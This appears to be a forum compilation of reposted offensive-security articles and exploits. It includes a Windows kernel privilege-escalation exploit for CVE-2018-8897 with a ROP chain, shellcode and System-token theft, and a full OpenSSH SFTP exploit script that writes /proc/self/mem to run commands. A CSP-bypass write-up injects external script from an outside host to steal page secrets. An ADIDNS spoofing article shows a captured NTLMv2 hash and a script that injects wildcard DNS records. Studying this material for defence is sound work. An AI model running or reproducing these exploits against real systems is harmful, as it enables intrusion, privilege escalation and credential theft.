.text:0000000140175C80 mov rax, cr0 .text:0000000140175C83 mov [rcx], rax .text:0000000140175C86 mov rax, cr2 .text:0000000140175C89 mov [rcx+8], rax .text:0000000140175C8D mov rax, cr3 .text:0000000140175C90 mov [rcx+10h], rax .text:0000000140175C94 mov rax, cr4 .text:0000000140175C97 mov [rcx+18h], rax .text:0000000140175C9B mov rax, cr8 .text:0000000140175C9F mov [rcx+0A0h], rax We will set DR1 on gs:20h + 0x100 + 0xA0, and make KeBugCheckEx return back to KiDebugTrapOrFault just after it saves the value of CR4. To overwrite the return pointer, we will first let KiDebugTrapOrFault->…->RtlCaptureContext execute once giving our user-mode thread an initial RSP value, then we will let it execute another time to get the new RSP, which will let us calculate per-execution RSP difference. This RSP delta will be constant because the control flow is also constant. Now that we have our RSP delta, we will predict the next value of RSP, subtract 8 from that to calculate the return pointer of RtlCaptureContext and make Prcb.Context->Xmm13 – Prcb.Context->Xmm15 written over it. Thread logic will be like the following: volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context ); while ( !Ctx->Rsp ); // Wait for RtlCaptureContext to be called once so we get leaked RSP uint64_t StackInitial = Ctx->Rsp; while ( Ctx->Rsp == StackInitial ); // Wait for it to be called another time so we get the stack pointer difference // between sequential KiDebugTrapOrFault StackDelta = Ctx->Rsp - StackInitial; PredictedNextRsp = Ctx->Rsp + StackDelta; // Predict next RSP value when RtlCaptureContext is called uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8; // Predict where the return pointer will be located at NextRetPtrStorage &= ~0xF; *( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13; // Make RtlCaptureContext write XMM13-XMM15 over it Now we simply need to set-up a ROP chain and write it to XMM13-XMM15. We cannot predict which half of XMM15 will get hit due to the mask we apply to comply with the movaps alignment requirement, so first two pointers should simply point at a [RETN] instruction. We need to load a register with a value we choose to set CR4 so XMM14 will point at a [POP RCX; RETN] gadget, followed by a valid CR4 value with SMEP disabled. As for XMM13, we are simply going to use a [MOV CR4, RCX; RETN;] gadget followed by a pointer to our shellcode. 
The final chain will look something like: -- &retn; (fffff80372e9502d) -- &retn; (fffff80372e9502d) -- &pop rcx; retn; (fffff80372ed9122) -- cr4_nosmep (00000000000506f8) -- &mov cr4, rcx; retn; (fffff803730045c7) -- &KernelShellcode (00007ff613fb1010) In our shellcode, we will need to restore the CR4 value, swapgs, rollback ISR stack, execute the code we want and IRETQ back to user-mode which can be done like below: NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0; using fnIRetToVulnStub = void( * ) ( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup ); NON_PAGED_DATA BYTE IRetToVulnStub[] = { 0x0F, 0x22, 0xE1, // mov cr4, rcx ; cr4 = original cr4 0x48, 0x89, 0xD4, // mov rsp, rdx ; stack = isr stack 0x4C, 0x89, 0xC1, // mov rcx, r8 ; rcx = ContextBackup 0xFB, // sti ; enable interrupts 0x48, 0xCF // iretq ; interrupt return }; NON_PAGED_CODE void KernelShellcode() { __writedr( 7, 0 ); uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 ); __writecr4( Cr4Old & ~( 1 << 20 ) ); __swapgs(); uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38; // Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault while ( ( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 && ( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF ) { __rollback_isr( IsrStackIterator ); // We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 ) { /* fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap fffff00e`d7a1bc40 0000000000000010 fffff00e`d7a1bc48 0000000000000002 fffff00e`d7a1bc50 fffff00ed7a1bc68 fffff00e`d7a1bc58 0000000000000000 fffff00e`d7a1bc60 0000000000000014 fffff00e`d7a1bc68 00007ff7e2261e95 -- fffff00e`d7a1bc70 0000000000000033 fffff00e`d7a1bc78 0000000000000202 fffff00e`d7a1bc80 000000ad39b6f938 */ IsrStackIterator = IsrStackIterator + 0x30; break; } IsrStackIterator -= StackDelta; } PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) ); Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) ); // ------ KERNEL CODE ------ .... // ------ KERNEL CODE ------ __swapgs(); ( ( ISR_STACK* ) IsrStackIterator )->RIP += 1; ( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup ); } We can’t restore any registers so we will make the thread responsible for the execution of vulnerability store the context in a global container and restore from it instead. Now that we executed our code and returned to user-mode, our exploit is complete! Let’s make a simple demo stealing the System token: uint64_t SystemProcess = *k_PsInitialSystemProcess; uint64_t CurrentProcess = k_PsGetCurrentProcess(); uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess ); uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess ); for ( int i = 0; i < 0x500; i += 0x8 ) { uint64_t Member = *( uint64_t * ) ( CurrentProcess + i ); if ( ( Member & ~0xF ) == CurrentToken ) { *( uint64_t * ) ( CurrentProcess + i ) = SystemToken; break; } } k_PsDereferencePrimaryToken( CurrentToken ); k_PsDereferencePrimaryToken( SystemToken ); Sursa: https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/
11. # OpenSSH <= 6.6 SFTP misconfiguration exploit for 32/64bit Linux
# The original discovery by Jann Horn: http://seclists.org/fulldisclosure/2014/Oct/35
#
# Adam Simuntis :: https://twitter.com/adamsimuntis
# Mindaugas Slusnys :: https://twitter.com/mislusnys

import paramiko
import sys
import time
from pwn import *

# parameters
cmd = 'touch /tmp/pwn; touch /tmp/pwn2'
host = '172.16.15.59'
port = 22
username = 'secforce'
password = 'secforce'

# connection
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname = host, port = port, username = username, password = password)
sftp = ssh.open_sftp()

# parse /proc/self/maps to get addresses
log.info("Analysing /proc/self/maps on remote system")
sftp.get('/proc/self/maps','maps')

with open("maps","r") as f:
    lines = f.readlines()
    for line in lines:
        words = line.split()
        addr = words[0]
        if ("libc" in line and "r-xp" in line):
            path = words[-1]
            addr = addr.split('-')
            BITS = 64 if len(addr[0]) > 8 else 32
            print "[+] {}bit libc mapped @ {}-{}, path: {}".format(BITS, addr[0], addr[1], path)
            libc_base = int(addr[0], 16)
            libc_path = path
        if ("[stack]" in line):
            addr = addr.split("-")
            saddr_start = int(addr[0], 16)
            saddr_end = int(addr[1], 16)
            print "[+] Stack mapped @ {}-{}".format(addr[0], addr[1])

# download remote libc and extract information
print "[+] Fetching libc from remote system..\n"
sftp.get(str(libc_path), 'libc.so')

e = ELF("libc.so")
sys_addr = libc_base + e.symbols['system']
exit_addr = libc_base + e.symbols['exit']

# gadgets for the RET slide and system()
if BITS == 64:
    pop_rdi_ret = libc_base + next(e.search('\x5f\xc3'))
    ret_addr = pop_rdi_ret + 1
else:
    ret_addr = libc_base + next(e.search('\xc3'))

print "\n[+] system() @ {}".format(hex(sys_addr))
print "[+] 'ret' @ {}".format(hex(ret_addr))
if BITS == 64:
    print "[+] 'pop rdi; ret' @ {}\n".format(hex(pop_rdi_ret))

with sftp.open('/proc/self/mem','rw') as f:
    if f.writable():
        print "[+] We have r/w permissions for /proc/self/mem! All Good."
    else:
        print "[-] Fatal error. No r/w permission for mem."
        sys.exit(0)

    log.info("Patching /proc/self/mem on the remote system")

    stack_size = saddr_end - saddr_start
    new_stack = ""

    print "[+] Pushing new stack to {}.. fingers crossed ;))".format(hex(saddr_start))
    #sleep(20)

    if BITS == 32:
        new_stack += p32(ret_addr) * (stack_size/4)
        new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-12]
        new_stack += p32(sys_addr)
        new_stack += p32(exit_addr)
        new_stack += p32(saddr_start)
    else:
        new_stack += p64(ret_addr) * (stack_size/8)
        new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-32]
        new_stack += p64(pop_rdi_ret)
        new_stack += p64(saddr_start)
        new_stack += p64(sys_addr)
        new_stack += p64(exit_addr)

    # debug info
    with open("fake_stack","w") as lg:
        lg.write(new_stack)

    # write cmd to top off the stack
    f.seek(saddr_start)
    f.write(cmd + "\x00")

    # write the rest from bottom up, we're going to crash at some point
    for off in range(stack_size - 32000, 0, -32000):
        cur_addr = saddr_start + off
        try:
            f.seek(cur_addr)
            f.write(new_stack[off:off+32000])
        except:
            print "Stack write failed - that's probably good!"
            print "Check if you command was executed..."
            sys.exit(0)

sftp.close()
ssh.close()

Sursa: https://www.exploit-db.com/exploits/45001/?rss&utm_source=dlvr.it&utm_medium=twitter
12. Neatly bypassing CSP

How to trick CSP into letting you run whatever you want
By bo0om, Wallarm research

Content Security Policy or CSP is a built-in browser technology which helps protect from attacks such as cross-site scripting (XSS). It lists and describes paths and sources from which the browser can safely load resources. The resources may include images, frames, javascript and more. But what if we could show a successful XSS attack even when no unsafe resource origins are allowed? Read on to find out how.

How CSP works when everything is well

A common usage scenario here is when CSP specifies that images can only be loaded from the current domain, which means that all the tags with external domains will be ignored. CSP is commonly used to block untrusted JS and minimize the chance of a successful XSS exploit. Here is an example of allowing resources from the local domain (self) to be loaded and executed inline:

Content-Security-Policy: default-src 'self' 'unsafe-inline';

Since a security policy implies "prohibited unless explicitly allowed", this configuration prohibits usage of any functions that execute code transmitted as a string. For example, eval, setTimeout and setInterval will all be blocked because unsafe-eval is not allowed. Any content from external sources is also blocked, including images, css, websockets and, especially, JS.

To see for yourself how it works, check out this code where I deliberately put in an XSS exploit. Try to steal the secret this way without spooking the user, i.e. without a redirect.

Tricking CSP

Despite the limitations, we can still load scripts, create frames and put together images, because self does not prevent working with the resources governed by the Same-Origin Policy (SOP). Since CSP also applies to frames, the same policy governs frames that may use data:, blob: or srcdoc content. So, can we really execute arbitrary javascript in a text file? The truth is out there.

We are going to rely on a neat trick here. Most modern browsers automatically convert files, such as text files or images, to an HTML page. The reason for this behavior is to correctly depict the content in the browser window; it needs to have the right background, be centered and so on. However, an iframe is also a browser window! Thus, opening any file that needs to be shown in a browser inside an iframe (i.e. favicon.ico or robots.txt) will immediately convert it into HTML without any data validation, as long as the content-type is right.

What happens if a frame opens a site page that doesn't have a CSP header? You can guess the answer. Without CSP, an open frame will execute all the JS inside the page, and since the frame is same-origin, we can write JS into the frame ourselves. To test this, let's try a scenario which opens an iframe. Let's use bootstrap.min.css, which we already mentioned earlier, as an example.

frame = document.createElement("iframe");
frame.src = "/css/bootstrap.min.css";
document.body.appendChild(frame);

Let's take a look at what's in the frame. As expected, the CSS got converted into HTML and we managed to overwrite the content of head (even though it was empty to begin with). Now, let's see if we can get it to pull in an external JS file.

script = document.createElement('script');
script.src = '//bo0om.ru/csp.js';
window.frames[0].document.head.appendChild(script);

It worked! This is how we can execute an injection through an iframe, create our own JS scenario and query the parent window to steal its data.
All you need for an XSS exploit is to open an iframe and point it at any path that doesn't include a CSP header. It can be the standard favicon.ico, robots.txt, sitemap.xml, css/js, jpg or other files.

PoC

Sleight of hand and no magic

What if the site developer was careful and any expected site response (200 OK) includes X-Frame-Options: Deny? We can still try to get in. The second common error in using CSP is a lack of protective headers when returning web-server errors. The simplest way to try this is to open a web page that doesn't exist. I noticed that many resources only include X-Frame-Options on responses with a 200 code and not with a 404 code.

If that is also accounted for, we can try causing the site to return a standard web-server "invalid request" message. For example, to force NGINX to return "400 bad request", all you need to do is to query one level above the web root at /../ To prevent the browser from normalizing the request and replacing /../ with /, we will use unicode for the dots and the last slash.

frame = document.createElement("iframe");
frame.src = "/%2e%2e%2f";
document.body.appendChild(frame);

Another possibility here is passing an incorrect unicode path, i.e. /% or /%%z

However, the easiest way to get a web-server to return an error is to exceed the allowed URL length. Most modern browsers can concoct a URL which is much, much longer than a web-server can handle. The default URL length limit for web-servers such as NGINX and Apache is set not to exceed 8 kB. To try that, we can execute a similar scenario with a path length of 20000 bytes:

frame = document.createElement("iframe");
frame.src = "/" + "A".repeat(20000);
document.body.appendChild(frame);

Yet another way to fool the server into returning an error is to trigger a cookie length limit. Again, browsers support more and longer cookies than web-servers can handle. Following the same scenario:

1. Create a humongous cookie:
   for(var i=0;i<5;i++){document.cookie=i+"="+"a".repeat(4000)};
2. Open an iframe using any address, which will cause the server to return an error (often without XFO or CSP).
3. Remove the humongous cookie:
   for(var i=0;i<5;i++){document.cookie=i+"="}
4. Write your own JS script into the frame that steals the parent's secret.

Try it for yourself. Here are some hints for you if you need them: PoC

There are many other ways to cause the web-server to return an error; for example, we can send a POST request which is too long or cause a web-server 500 error somehow.

Why is CSP so gullible and what to do about it?

The simple underlying reason is that the policy controlling the resource is embedded within the resource itself. To avoid the bad situations, my recommendations are:

- CSP headers should be present on all the pages, even on the error pages returned by the web-server.
- CSP options should be configured to restrict the rights to just those necessary to work with the specific resource. Try setting Content-Security-Policy-Report-Only: default-src 'none' and gradually adding permission rules for specific use cases.
- If you have to use unsafe-inline for correctly loading and processing the resources, your only protection is to use nonce or hash-source. Otherwise, you are exposed to XSS exploits, and if CSP doesn't protect you, why do you need it in the first place?!

Additionally, as shared by @majorisc, another trick for stealing the data from a page is to use RTCPeerConnection and to pass the secret via DNS requests. default-src 'self' doesn't protect from it, unfortunately.
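To act on the first recommendation above, a quick way to audit your own site is to request a few of the error conditions described in this post and check whether the protective headers survive. Below is a minimal sketch using Python's requests library; the base URL is a placeholder.

import requests

BASE = "https://example.com"   # placeholder target

probes = {
    "normal page": "/",
    "missing page": "/this-page-should-not-exist",
    "dot-dot path": "/%2e%2e%2f",
    "oversized URL": "/" + "A" * 20000,
}

for name, path in probes.items():
    try:
        r = requests.get(BASE + path, timeout=10, allow_redirects=False)
    except requests.RequestException as exc:
        print("{:>13}: request failed ({})".format(name, exc))
        continue
    # An error response missing these headers is exactly the frameable,
    # CSP-free page this post abuses.
    csp = r.headers.get("Content-Security-Policy", "MISSING")
    xfo = r.headers.get("X-Frame-Options", "MISSING")
    print("{:>13}: HTTP {} CSP={} XFO={}".format(name, r.status_code, csp, xfo))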
Keep reading our blog for more tricks from our magic bag. Sursa: https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa
  13. Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS Kevin Robertson July 10th, 2018 Exploiting weaknesses in name resolution protocols is a common technique for performing man-in-the-middle (MITM) attacks. Two particularly vulnerable name resolution protocols are Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBNS). Attackers leverage both of these protocols to respond to requests that fail to be answered through higher priority resolution methods, such as DNS. The default enabled status of LLMNR and NBNS within Active Directory (AD) environments allows this type of spoofing to be an extremely effective way to both gain initial access to a domain, and also elevate domain privilege during post exploitation efforts. The latter use case lead to me developing Inveigh, a PowerShell based LLMNR/NBNS spoofing tool designed to run on a compromised AD host. PS C:\users\kevin\Desktop\Inveigh> Invoke-Inveigh -ConsoleOutput Y [*] Inveigh 1.4 Dev started at 2018-07-05T22:29:35 [+] Elevated Privilege Mode = Enabled [+] Primary IP Address = 192.168.125.100 [+] LLMNR/NBNS/mDNS/DNS Spoofer IP Address = 192.168.125.100 [+] LLMNR Spoofer = Enabled [+] NBNS Spoofer = Enabled [+] SMB Capture = Enabled [+] HTTP Capture = Enabled [+] HTTPS Capture = Disabled [+] HTTP/HTTPS Authentication = NTLM [+] WPAD Authentication = NTLM [+] WPAD Default Response = Enabled [+] Real Time Console Output = Enabled WARNING: [!] Run Stop-Inveigh to stop manually [*] Press any key to stop real time console output [+] [2018-07-05T22:29:53] LLMNR request for badrequest received from 192.168.125.102 [Response Sent] [+] [2018-07-05T22:29:53] SMB NTLMv2 challenge/response captured from 192.168.125.102(INVEIGH-WKS2): testuser1::INVEIGH:3E834C6F9FC3CA5B:CBD38F1537AAD7D39CE6A5BC5687373A:010100000000000071ADB439D114D401D5B48AB8C3EC8E010000000002000E0049004E00560045004900470048000100180049004E00560045004900470048002D0057004B00530031000400160069006E00760065006900670068002E006E00650074000300300049006E00760065006900670068002D0057004B00530031002E0069006E00760065006900670068002E006E00650074000500160069006E00760065006900670068002E006E00650074000700080071ADB438D114D401060004000200000008003000300000000000000000000000002000004FC481EC79C5F6BB2B29A2C828A02EC028C9FF563BE5D9597D51FD6DF29DC8BD0A0010000000000000000000000000000000000009001E0063006900660073002F006200610064007200650071007500650073007400000000000000000000000000 Throughout my time working on Inveigh, I’ve explored LLMNR/NBNS spoofing from the perspective of different levels of privilege within AD environments. Many of the updates to Inveigh along the way have actually attempted to cover additional privilege based use cases. Recently though, some research outside of Inveigh has placed a nagging question in my head. Is LLMNR/NBNS spoofing even the best way to perform name resolution based MITM attacks if you already have unprivileged access to a domain? In an effort to obtain an answer, I kept returning to the suspiciously configured AD role which inspired the question to begin with, Active Directory-Integrated DNS (ADIDNS). Take it from the Top For the purpose of this write-up, I’ll just recap two key areas of of LLMNR/NBNS spoofing. First, without implementing some router based wizardry, LLMNR and NBNS requests are contained within a single multicast or broadcast domain respectively. This can greatly limit the scope of a spoofing attack with regards to both the affected systems and potential privilege of the impacted sessions. 
Second, by default, Windows systems use the following priority list while attempting to resolve name resolution requests through network based protocols: DNS LLMNR NBNS Although not exploited directly as part of the attacks, DNS has a large impact on the effectiveness of LLMNR/NBNS spoofing due to controlling which requests fall down to LLMNR and NBNS. Basically, if a name request matches a record listed in DNS, a client won’t usually attempt to resolve the request through LLMNR and NBNS. Do we really need to settle for anything less than the top spot in the network based name resolution protocol hierarchy when performing our attacks? Is there a simple way to leverage DNS directly? Keeping within our imposed limitation of having only unprivileged access to a domain, let’s see what we have to work with. Active Directory-Integrated DNS Zones Modifying ADIDNS Zones Dynamic Updates Supplementing LLMNR/NBNS Spoofing with Dynamic Updates Remembering the Way Wildcard Records What’s in a Name? ADIDNS Syncing and Replication SOA Serial Number Maintaining Control of Nodes Node Tombstoning Node Deletion Defending Against ADIDNS Attacks And the Winner Is? Tools! Active Directory-Integrated DNS Zones Domain controllers and ADIDNS zones go hand in hand. Each domain controller will usually have an accessible DNS server hosting at least the default ADIDNS zones. The first default setting I’d like to highlight is the ADIDNS zone discretionary access control list (DACL). As you can see, the zone has ‘Authenticated Users’ with ‘Create all child objects’ listed by default. An authenticated user is a pretty low barrier of entry for a domain and certainly covers our unprivileged access goal. But how do we put ourselves into a position to leverage this permission and what can we do with it? Modifying ADIDNS Zones There are two primary methods of remotely modifying an ADIDNS zone. The first involves using the RPC based management tools. These tools generally require a DNS administrator or above so I won’t bother describing their capabilities. The second method is DNS dynamic updates. Dynamic updates is a DNS specific protocol designed for modifying DNS zones. Within the AD world, dynamic updates is primarily leveraged by machine accounts to add and update their own DNS records. This brings us to another default ADIDNS zone setting of interest, the enabled status of secure dynamic updates. Dynamic Updates Last year, in order to leverage this default setting more easily during post exploitation, I developed a PowerShell DNS dynamic updates tool called Invoke-DNSUpdate. PS C:\Users\kevin\Desktop\Powermad> Invoke-DNSupdate -DNSType A -DNSName test -DNSData 192.168.125.100 -Verbose VERBOSE: [+] TKEY name 648-ms-7.1-4675.57409638-8579-11e7-5813-000c296694e0 VERBOSE: [+] Kerberos preauthentication successful VERBOSE: [+] Kerberos TKEY query successful [+] DNS update successful The rules for using secure dynamic updates are pretty straightforward once you understand how permissions are applied to the records. If a matching DNS record name does not already exist in a zone, an authenticated user can create the record. The creator account will receive ownership/full control of the record. If a matching record name already exists in the zone, the authenticated user will be prevented from modifying or removing the record unless the user has the required permission, such as the case where a user is an administrator. Notice that I’m using record name instead of just record. The standard DNS view can be confusing in this regard. 
Permissions are actually applied based on the record name rather than individual records as viewed in the DNS console. For example, if a record named ‘test’ is created by an administrator, an unprivileged account cannot create a second record named ‘test’ as part of a DNS round robin setup. This also applies across multiple record types. If a default A record exists for the root of the zone, an unprivileged account cannot create a root MX record for the zone since both records are internally named ‘@’. Further along in this post, we will take a look at DNS records from another perspective which will offer a better view of ADIDNS records grouped by name. Below are default records that will prevent an unprivileged account from impacting AD services such as Kerberos and LDAP. There are few limitations for record types that can be created through dynamic updates with an unprivileged user. The permitted types are only restricted to those that are supported by the Windows server dynamic updates implementation. Most common record types are supported. Invoke-DNSUpdate itself currently supports A, AAAA, CNAME, MX, PTR, SRV, and TXT records. Overall, secure dynamic updates alone is certainly exploitable if non-existing DNS records worth adding can be identified. Supplementing LLMNR/NBNS Spoofing with Dynamic Updates In a quest to weaponize secure dynamic updates to function in a similar fashion to LLMNR/NBNS spoofing, I looked at injecting records into ADIDNS that matched received LLMNR/NBNS requests. In theory, a record that falls down to LLMNR/NBNS shouldn’t exist in DNS. Therefore, these records are eligible to be created by an authenticated user. This method is not practical for rare or one time only name requests. However, if you keep seeing the same requests through LLMNR/NBNS, it may be beneficial to add the record to DNS. The upcoming version of Inveigh contains a variation of this technique. If Inveigh detects the same LLMNR/NBNS request from multiple systems, a matching record can be added to ADIDNS. This can be effective when systems are sending out LLMNR/NBNS requests for old hosts that are no longer in DNS. If multiple systems within a subnet are trying to resolve specific names, outside systems may also be trying. In that scenario, injecting into ADIDNS will help extend the attack past the subnet boundary. PS C:\users\kevin\Desktop\Inveigh> Invoke-Inveigh -ConsoleOutput Y -DNS Y -DNSThreshold 4 [*] Inveigh 1.4 Dev started at 2018-07-05T22:32:37 [+] Elevated Privilege Mode = Enabled [+] Primary IP Address = 192.168.125.100 [+] LLMNR/NBNS/mDNS/DNS Spoofer IP Address = 192.168.125.100 [+] LLMNR Spoofer = Enabled [+] DNS Injection = Enabled [+] SMB Capture = Enabled [+] HTTP Capture = Enabled [+] HTTPS Capture = Disabled [+] HTTP/HTTPS Authentication = NTLM [+] WPAD Authentication = NTLM [+] WPAD Default Response = Enabled [+] Real Time Console Output = Enabled WARNING: [!] Run Stop-Inveigh to stop manually [*] Press any key to stop real time console output [+] [2018-07-05T22:32:52] LLMNR request for dnsinject received from 192.168.125.102 [Response Sent] [+] [2018-07-05T22:33:00] LLMNR request for dnsinject received from 192.168.125.100 [Response Sent] [+] [2018-07-05T22:35:00] LLMNR request for dnsinject received from 192.168.125.104 [Response Sent] [+] [2018-07-05T22:41:00] LLMNR request for dnsinject received from 192.168.125.105 [Response Sent] [+] [2018-07-05T22:50:00] LLMNR request for dnsinject received from 192.168.125.106 [Response Sent] WARNING: [!] 
[2018-07-05T22:33:01] DNS (A) record for dnsinject added Remembering the Way While trying to find an ideal secure dynamic updates attack, I kept hitting roadblocks with either the protocol itself or the existence of default DNS records. Since, as mentioned, I had planned on rolling a dynamic updates attack into Inveigh, I started thinking more about how the technique would be employed during penetration tests. To help testers confirm that the attack would even work, I realized that it would be helpful to create a PowerShell function that could view ADIDNS zone permissions through the context of an unprivileged account. But how would I even remotely enumerate the DACL without access to the administrator only tools? Some part of my brain that obliviously hadn’t been taking part in this ADIDNS research immediately responded with, “the zones are stored in AD, just view the DACL through LDAP.” LDAP… …there’s another way into the zones that I haven’t checked. Reviewing the topic that I likely ran into during my days as a network administrator, I found that the ADIDNS zones are currently stored in either the DomainDNSZones or ForestDNSZones partitions. LDAP provides a method for ‘Authenticated Users’ to modify an ADIDNS zone without relying on dynamic updates. DNS records can be added to an ADIDNS zone directly through LDAP by creating an AD object of class dnsNode. With this simple understanding, I now had a method of executing the DNS attack I had been chasing the whole time. Wildcard Records Wildcard records allow DNS to function in a very similar fashion to LLMNR/NBNS spoofing. Once you create a wildcard record, the DNS server will use the record to answer name requests that do not explicitly match records contained in the zone. PS C:\Users\kevin\Desktop\Powermad> Resolve-DNSName NoDNSRecord Name Type TTL Section IPAddress ---- ---- --- ------- --------- NoDNSRecord.inveigh.net A 600 Answer 192.168.125.100 Unlike LLMNR/NBNS, requests for fully qualified names matching a zone are also resolved. PS C:\Users\kevin\Desktop\Powermad> Resolve-DNSName NoDNSRecord2.inveigh.net Name Type TTL Section IPAddress ---- ---- --- ------- --------- NoDNSRecord2.inveigh.net A 600 Answer 192.168.125.100 With dynamic updates, my wildcard record injection efforts were prevented by limitations within dynamic updates itself. Dynamic updates, at least the Windows implementation, just doesn’t seem to process the ‘*’ character correctly. LDAP however, does not have the same problem. PS C:\Users\kevin\Desktop\Powermad> New-ADIDNSNode -Node * -Verbose VERBOSE: [+] Domain Controller = Inveigh-DC1.inveigh.net VERBOSE: [+] Domain = inveigh.net VERBOSE: [+] ADIDNS Zone = inveigh.net VERBOSE: [+] Distinguished Name = DC=*,DC=inveigh.net,CN=MicrosoftDNS,DC=DomainDNSZones,DC=inveigh,DC=net VERBOSE: [+] Data = 192.168.125.100 VERBOSE: [+] DNSRecord Array = 04-00-01-00-05-F0-00-00-BA-00-00-00-00-00-02-58-00-00-00-00-22-D8-37-00-C0-A8-7D-64 [+] ADIDNS node * added What’s in a Name? Taking a step back, let’s look at how DNS nodes are used to form an ADIDNS record. The main structure of the record is stored in the dnsRecord attribute. This attribute defines elements such as the record type, target IP address or hostname, and static vs. dynamic classification. All of the key record details outside of the name are stored in dnsRecord. If you are interested, more information for the attribute’s structure can be found in MS-DNSP. 
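For readers who want to see the LDAP path without the PowerShell tooling, below is a minimal Python sketch using the ldap3 library. The domain controller, credentials, zone and IP address are placeholders, and the dnsRecord layout is my reading of MS-DNSP and of the example byte array shown above, so treat it as an approximation rather than the Powermad implementation (the author's New-DNSRecordArray function, shown next, builds the same structure in PowerShell). It builds a static A-record dnsRecord value and creates a wildcard dnsNode using the distinguished name format from the output above.

import socket
import struct

import ldap3

def make_a_record(ip, serial=1, ttl=600):
    # DNS_RPC_RECORD-style blob: DataLength, Type (1 = A), Version, Rank,
    # Flags, Serial, TTL (big-endian), Reserved, TimeStamp, then the address.
    # A zero TimeStamp marks the record as static; field meanings follow
    # MS-DNSP and are simplified here.
    data = socket.inet_aton(ip)
    blob = struct.pack('<HH', len(data), 1)
    blob += struct.pack('<BBH', 0x05, 0xF0, 0)
    blob += struct.pack('<I', serial)
    blob += struct.pack('>I', ttl)
    blob += struct.pack('<II', 0, 0)
    return blob + data

# Placeholder connection details for a lab domain.
server = ldap3.Server('inveigh-dc1.inveigh.net')
conn = ldap3.Connection(server, user='INVEIGH\\lowpriv', password='Password123!',
                        authentication=ldap3.NTLM, auto_bind=True)

# Wildcard node in the default domain zone, mirroring the DN shown above.
dn = 'DC=*,DC=inveigh.net,CN=MicrosoftDNS,DC=DomainDNSZones,DC=inveigh,DC=net'
attributes = {
    'objectClass': ['top', 'dnsNode'],
    'dnsRecord': [make_a_record('192.168.125.100')],
    'dNSTombstoned': 'TRUE',   # keeps the node modifiable later, as discussed further on
}

if conn.add(dn, attributes=attributes):
    print('[+] dnsNode added')
else:
    print('[-] add failed:', conn.result)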
I created a PowerShell function called New-DNSRecordArray which can create a dnsRecord array for A, AAAA, CNAME, DNAME, MX, NS, PTR, SRV, and TXT record types. PS C:\Users\kevin\Desktop\Powermad> $dnsRecord = New-DNSRecordArray -Type A -Data 192.168.125.100 PS C:\Users\kevin\Desktop\Powermad> [System.Bitconverter]::ToString($dnsrecord) 04-00-01-00-05-F0-00-00-BA-00-00-00-00-00-02-58-00-00-00-00-79-D8-37-00-C0-A8-7D-64 As I previously mentioned, LDAP offers a better view of how DNS records with a matching name are grouped together. A single DNS node can have multiple lines within the dnsRecord attribute. Each line represents a separate DNS record of the same name. Below is an example of the multiple records all contained within the dnsRecord attribute of a node named ‘@’. Lines can be added to a node’s dnsRecord attribute by appending rather than overwriting the existing attribute value. The PowerShell function I created to perform attribute edits, Set-ADIDNSNodeAttribute, has an ‘Append’ switch to perform this task. ADIDNS Syncing and Replication When modifying an ADIDNS zone through LDAP, you may observe a delay between when the node is added to LDAP and when the record appears in DNS. This is due to the fact that the DNS server service is using its own in-memory copy of the ADIDNS zone. By default, the DNS server will sync the in-memory copy with AD every 180 seconds. In large, multi-site AD infrastructures, domain controller replication time may be a factor in ADIDNS spoofing. To fully leverage the reach of added records within an enterprise, the attack time will need to extend past replication delays. By default, replication between sites can take up to three hours. To cut down on delays, start the attack by targeting the DNS server which will have the biggest impact. Although adding records to each DNS server in an environment in order to jump ahead of replication will work, keep in mind that AD will need to sort out the duplicate objects once replication does take place. SOA Serial Number Another consideration when working with ADIDNS zones is the potential presence integrated DNS servers on the network. If a server is hosting a secondary zone, the serial number is used to determine if a change has occurred. Luckily, this number can be incremented when adding a DNS node through LDAP. The incremented serial number needs to be included in the node’s dnsRecord array to ensure that the record is copied to the server hosting the secondary zone. The zone’s SOA serial number will be the highest serial number listed in any node’s dnsRecord attribute. Care should be taken to only increment the SOA serial number by one so that a zone’s serial number isn’t unnecessarily increased by a large amount. I have created a PowerShell function called New-SOASerialNumberArray that simplifies the process. PS C:\Users\kevin\Desktop\Powermad> New-SOASerialNumberArray 62 0 0 0 The SOA serial number can also be obtained through nslookup. PS C:\Users\kevin\Desktop\Powermad> nslookup Default Server: UnKnown Address: 192.168.125.10 > set type=soa > inveigh.net Server: UnKnown Address: 192.168.125.10 inveigh.net primary name server = inveigh-dc1.inveigh.net responsible mail addr = hostmaster.inveigh.net serial = 255 refresh = 900 (15 mins) retry = 600 (10 mins) expire = 86400 (1 day) default TTL = 3600 (1 hour) inveigh-dc1.inveigh.net internet address = 192.168.125.10 The gathered serial number can be fed directly to New-SOASerialNumberArray. 
